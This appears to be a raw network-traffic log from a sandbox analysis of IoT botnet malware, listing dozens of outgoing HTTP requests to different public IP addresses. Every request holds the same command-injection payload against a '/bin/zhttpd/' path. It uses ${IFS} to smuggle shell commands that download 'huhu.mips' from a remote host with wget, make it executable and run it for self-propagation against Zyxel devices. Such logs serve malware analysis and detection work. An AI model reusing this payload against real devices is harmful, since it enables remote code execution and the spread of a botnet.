                                                Jan 29, 2024 07:08:02.636049032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7963192.168.2.235269692.167.122.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.636118889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7964192.168.2.2360456220.59.22.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.636158943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7965192.168.2.2336916144.101.197.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.636178017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7966192.168.2.23473468.91.55.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.636205912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7967192.168.2.234381641.97.59.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.636261940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7968192.168.2.233624049.212.64.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.636285067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7969192.168.2.2346644142.95.163.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.636317968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7970192.168.2.2333958104.243.241.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.636367083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7971192.168.2.2347660222.155.83.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.636436939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7972192.168.2.2351634170.68.97.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.636478901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7973192.168.2.2346274135.243.75.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.636504889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7974192.168.2.2344528104.52.180.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.636557102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7975192.168.2.2360254133.3.89.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.636607885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7976192.168.2.2347756161.102.30.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.636636972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7977192.168.2.2344790139.81.122.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.636666059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7978192.168.2.2337834146.205.119.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.636710882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7979192.168.2.2341034222.50.132.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.636754036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7980192.168.2.233367844.238.202.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.636802912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7981192.168.2.2335372129.61.254.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.636847973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7982192.168.2.2337490129.130.114.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.636889935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7983192.168.2.235345824.165.33.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.636919022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7984192.168.2.2341896171.42.124.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.636946917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7985192.168.2.233300258.22.33.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.636993885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7986192.168.2.234848864.122.40.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.637034893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7987192.168.2.235270250.254.106.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.637068033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7988192.168.2.233674264.133.104.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.637100935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7989192.168.2.234365245.246.50.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.637125969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7990192.168.2.233888287.7.146.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.637167931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7991192.168.2.2347580113.158.66.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.637214899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7992192.168.2.233886827.203.135.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.637254953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7993192.168.2.2339158176.123.184.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.637303114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7994192.168.2.234774034.222.116.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.637360096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7995192.168.2.234610854.157.164.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.637397051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7996192.168.2.2354244128.175.104.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.637444019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7997192.168.2.233786073.254.213.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.637465000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7998192.168.2.2350444121.251.117.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.637507915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7999192.168.2.234498670.238.113.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.637526989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8000192.168.2.2354854216.85.172.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.637587070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8001192.168.2.235673096.50.212.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.637602091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8002192.168.2.2355794174.184.122.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.637666941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8003192.168.2.233970276.189.215.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.637701988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8004192.168.2.2353650129.20.148.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.637737036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8005192.168.2.233465081.215.152.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.637780905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8006192.168.2.2345588204.184.175.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.637841940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8007192.168.2.2341450157.131.69.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.637872934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8008192.168.2.235167680.208.173.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.637916088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8009192.168.2.234844427.176.132.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.637959003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8010192.168.2.2341550168.48.142.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.638011932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8011192.168.2.234273095.177.29.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.638062000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8012192.168.2.235314489.177.89.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.638092041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8013192.168.2.2334772186.144.206.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.638128042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8014192.168.2.2353210220.22.252.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.638180971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8015192.168.2.2351586149.115.231.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.638197899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8016192.168.2.2352890111.240.251.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.638247967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8017192.168.2.2360836121.172.20.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.638284922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8018192.168.2.2335064183.233.209.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.638333082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8019192.168.2.2348196202.235.240.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.638386011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8020192.168.2.233843888.228.60.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.638420105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8021192.168.2.233508473.159.31.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.638448954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8022192.168.2.2344344146.107.14.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.638487101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8023192.168.2.2338966197.222.43.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.638554096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8024192.168.2.236053040.108.129.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.638598919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8025192.168.2.234324245.124.60.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.638624907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8026192.168.2.2343022196.209.104.71443
                                                TimestampBytes transferredDirectionData
